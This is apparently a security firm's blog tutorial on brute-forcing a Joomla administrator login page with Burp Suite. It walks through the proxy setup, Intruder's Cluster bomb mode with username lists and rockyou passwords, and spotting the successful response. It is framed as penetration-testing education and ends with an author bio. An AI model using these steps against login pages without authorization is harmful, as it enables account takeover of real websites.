The purpose of this blog is to demonstrate how to brute force a login page using Burp Suite. There are other brute force tools such as Hydra and Ncrack. Although both are great tools, Burp Suite is more suitable for brute forcing a web application login page, whereas Hydra and Ncrack are more suitable for other protocols such as SSH and RDP.
Setting Burp Suite as a Web Proxy
Burp is designed to be used alongside your browser. Burp functions as an HTTP proxy server, and all your HTTP/S traffic from your browser passes through Burp. To ensure that Burp’s proxy listener is working, go to the Proxy tab and make sure that you see Intercept is on, as shown below.
Now, you need to configure your browser to use Burp Proxy listener as its HTTP proxy server. To do this, you need to change your browser’s proxy settings to use the proxy host address (127.0.0.1) and port 8080 for both HTTP and HTTPS protocols. Firefox is the default browser in Kali so open Firefox and go to Preferences. Click on Advanced, select Network tab, and click on Settings, as shown below.
Select the Manual proxy configuration radio button. Enter 127.0.0.1 in the HTTP Proxy field and enter 8080 in the Port field. Make sure the Use this proxy server for all protocols box is checked. Delete anything that’s in the No proxy for field. Save the settings.
Now, if everything is configured properly, all your HTTP/S traffic should go through Burp. Whenever you visit a website, Proxy tab in Burp will change its color to orange and Burp will hold on to the request until you decide what to do with it. At this point, you can turn off the intercept and only turn it on when you need it.
How to Brute Force Login Pages
Let’s say you are performing a penetration test against your client’s website and you come across a Joomla! administrator interface. If you can brute force the admin account, you will have total control over the website. To brute force the login page, open Burp and make sure Burp’s intercept is on.
In this demonstration, we will brute force both the username and password. I’ve made my own username list because I am certain that the username would be one of these three: root, administrator, or admin. Also, there are numerous username/password lists in /usr/share/wordlists directory. For this demonstration, I’ve used the top 500 passwords from the rockyou list.
Once you have your username and password lists ready, type anything in the username and password fields, in my case I used canary/canary1. Your HTTP request will be captured by Burp and will be waiting for your action. You'll be able to see what you’ve put for the username and password, as shown below. Right click and send the request to Intruder. Drop the request and turn off the intercept.
Click on Intruder tab and go to the Positions tab, as shown below. Make sure the Attack type is set to Cluster bomb (if you already know the username and only want to brute force the password, select Sniper). Burp highlights all the positions where payloads can be inserted. We are only interested in username and passwd parameters. Select Clear and highlight canary and click Add. Do the same thing for canary1.
Go to the Payloads tab and click the Payload set drop down menu. You can see that there are 2 payloads: one for the username and one for the password. Choose 1 and load the username list by clicking on Load. Do the same thing for password after you select 2 in the Payload set. Now, launch the brute force attack by clicking on Start attack at the top right corner.
While Burp is brute forcing the login page, check any anomalies in the the responses. Going through the requests, I noticed that the status for the request 78 is 301. All the other requests came back with a 200, displaying “Username and password do not match.” Using the username and password used by request 78 (admin/sunshine), I was able to get in to the administrator interface!
There are many ways to brute force a login page and using Burp Suite is one of them. To learn more about password cracking, read our previous blogs: Online Password Cracking: The Attack and the Best Defense Against It and Offline Password Cracking: The Attack and the Best Defense Against It.
Joseph Choi is a Cybersecurity Analyst with Alpine Security. He holds several security-related certifications, including EC-Council Certified Security Analyst (ECSA), CyberSec First Responder (CFR), Security+, and Network+. Joseph is a recent graduate from Truman State University with a B.S. in Business Administration. Joseph's cybersecurity experience began at Alpine and includes penetration tests, vulnerability assessments, and wireless penetration tests. He was born and raised in South Korea until the age of 10 when he moved to Mexico. It wasn't until 2007 that his family moved to the States where he completed his high school and college education. He is a fan of Mr. Robot, and in his spare time he enjoys spending time with his girlfriend, taking long walks around the park, and going to the gym.